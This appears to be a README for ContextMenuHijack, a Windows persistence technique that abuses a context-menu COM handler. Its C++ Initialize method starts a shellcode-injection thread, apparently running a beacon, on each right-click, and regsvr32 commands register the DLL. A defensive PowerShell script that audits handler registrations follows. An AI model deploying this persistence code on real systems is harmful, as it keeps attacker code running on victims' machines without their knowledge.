The original idea that inspired me is from @NinjaParanoid:
ContextMenuHijack is a simple persistence technique that uses COM hijacking and relies on human behavior: when you right-click a file or folder in File Explorer to open the context menu, the beacon we specified is executed at the same time.
    IFACEMETHODIMP FileContextMenuExt::Initialize(LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID) {
        // Explorer calls Initialize when it loads the handler for a right-click.
        DWORD tid = 0;
        // Start InjectShc on a new thread with a 1 MiB stack size.
        CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);
        if (NULL == pDataObj) {
            if (pidlFolder != NULL) {
            }
            return S_OK;
        }
        return S_OK;
    }
You just have to load the solution file (.sln) and build it. It's important to know that you need administrator privileges to use this persistence technique. Once you have done all of this, you just have to register the DLL file in the registry with regsvr32:

    regsvr32 "C:\path\to\ContextMenuHijack.dll"

If you want to uninstall it, just use the /u flag:

    regsvr32 /u "C:\path\to\ContextMenuHijack.dll"
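
For defenders: a context menu handler is registered under the `shellex\ContextMenuHandlers` keys of HKEY_CLASSES_ROOT, and its CLSID's InprocServer32 value names the DLL that explorer.exe loads, so a registration like the one above can be audited. The read-only PowerShell script below is an added example, not part of the ContextMenuHijack project. The list of class roots, the trusted directory prefixes and the System32 fallback for bare file names are assumptions to tune per environment.

```powershell
# Added audit example; not part of the ContextMenuHijack project. Read-only.
# Shell object classes whose context menu handlers are listed (assumed set; extend as needed).
$roots = '*', 'AllFilesystemObjects', 'Directory', 'Directory\Background', 'Folder', 'Drive'

# Directories where installed software normally keeps shell extensions (assumption).
$trusted = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }

$handlers = foreach ($root in $roots) {
    $key = "Registry::HKEY_CLASSES_ROOT\$root\shellex\ContextMenuHandlers"
    if (-not (Test-Path -LiteralPath $key)) { continue }

    foreach ($h in Get-ChildItem -LiteralPath $key) {
        # The CLSID is either the key's default value or the key name itself.
        $clsid = @([string]$h.GetValue(''), $h.PSChildName) |
            Where-Object { $_ -match '^\{[0-9A-Fa-f-]{36}\}$' } | Select-Object -First 1
        if (-not $clsid) { continue }

        # InprocServer32's default value is the DLL that explorer.exe loads.
        $srv = Get-Item -LiteralPath "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\InprocServer32" -ErrorAction SilentlyContinue
        if (-not $srv) { continue }
        $dll = ([string]$srv.GetValue('')).Trim('"')
        if (-not $dll) { continue }
        # Bare file names follow the loader's search order; System32 is assumed here.
        if (-not [IO.Path]::IsPathRooted($dll)) { $dll = Join-Path $env:SystemRoot "System32\$dll" }

        $sig = if (Test-Path -LiteralPath $dll -PathType Leaf) {
            (Get-AuthenticodeSignature -LiteralPath $dll).Status
        } else { 'FileMissing' }

        $inTrusted = [bool]($trusted | Where-Object { $dll.StartsWith($_, [StringComparison]::OrdinalIgnoreCase) })

        [pscustomobject]@{
            Root = $root; Handler = $h.PSChildName; Clsid = $clsid
            Dll = $dll; Signature = $sig; InTrustedDir = $inTrusted
        }
    }
}

# Review anything unsigned, missing on disk, or loaded from an unusual directory.
$handlers | Where-Object { $_.Signature -ne 'Valid' -or -not $_.InTrustedDir } |
    Sort-Object Dll, Root | Format-Table -AutoSize -Wrap
```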